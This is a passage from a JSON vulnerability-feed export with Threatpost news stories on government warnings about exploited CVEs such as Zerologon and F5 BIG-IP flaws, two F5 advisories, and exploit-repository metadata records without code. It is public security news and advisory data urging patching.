as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[![Threatpost Webinar Promo Retail Security](https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/07103433/webinar-promo-retail-security-1.jpg)](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-02-01T00:00:00", "description": "When running in Appliance mode with Advanced WAF or ASM provisioned, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. ([CVE-2021-22989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22989>))\n\n**Note**: For systems not running in Appliance mode, refer to [K45056101 Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nImpact\n\nThis vulnerability allows highly privileged authenticated users with the roles Administrator, Resource Administrator, or Application Security Administrator with network access to the Configuration utility, through the BIG-IP management port or self IP addresses, to execute arbitrary system commands, create or delete files, or disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise and breakout of Appliance mode. Appliance mode is enforced by a specific license or may be enabled or disabled for individual vCMP guest instances. For information on Appliance mode, refer to [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>).\n\n**Note**: If you believe your system may have been compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-10T14:49:00", "type": "f5", "title": "Appliance mode Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22989", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-23007"], "modified": "2021-07-08T06:25:00", "id": "F5:K56142644", "href": "https://support.f5.com/csp/article/K56142644", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-01T00:00:00", "description": "When running in Appliance Mode, an authenticated user assigned the 'Administrator' role may be able to bypass Appliance Mode restrictions utilizing undisclosed iControl REST endpoints. ([CVE-2021-23015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23015>))\n\n**Note**: This vulnerability is unrelated to the vulnerability described in the following article: [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>).\n\nImpact\n\nIn Appliance Mode, an authenticated user with valid user credentials assigned the Administrator role may be able to bypass appliance mode restrictions and run arbitrary commands. This is a control plane issue; there is no data plane exposure. Appliance Mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. For information on Appliance mode, refer to: [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>). \n\n**Note**: If you believe your system may have been compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-28T15:27:00", "type": "f5", "title": "Appliance Mode authenticated iControl REST vulnerability CVE-2021-23015", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-23015"], "modified": "2021-07-22T02:46:00", "id": "F5:K74151369", "href": "https://support.f5.com/csp/article/K74151369", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-21T12:47:54", "description": "## Vuln Impact\r\n\r\nThis vulnerability allows for unauthenticated ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T07:13:50", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-21T02:11:00", "id": "B96958C0-96FF-52FF-A4B1-CE6F774F0C6F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:28:22", "description": "# CVE-2021-22986\n\nThis is a simple script to ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T13:01:08", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-03-29T13:04:49", "id": "67F9A7F6-596E-5695-BCBF-B11FE476AD9E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:40:57", "description": "# F5 BIG-IP \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-22986\uff09\n\n## \u6f0f\u6d1e\u5f71\u54cd\n\nF5 BIG-IP 16.x: 1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T03:32:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-05T07:21:07", "id": "BF090D08-5787-5245-85E4-88DA87E8EC1D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:02", "description": "# CVE-2021-22986\nF5 BIG-IP/BIG-IQ iControl Rest...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T04:58:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-11-03T13:24:11", "id": "08530E98-10F4-5651-8118-F76E99D5856F", "href": "", "cvss": {"score": 10.0, "vector": 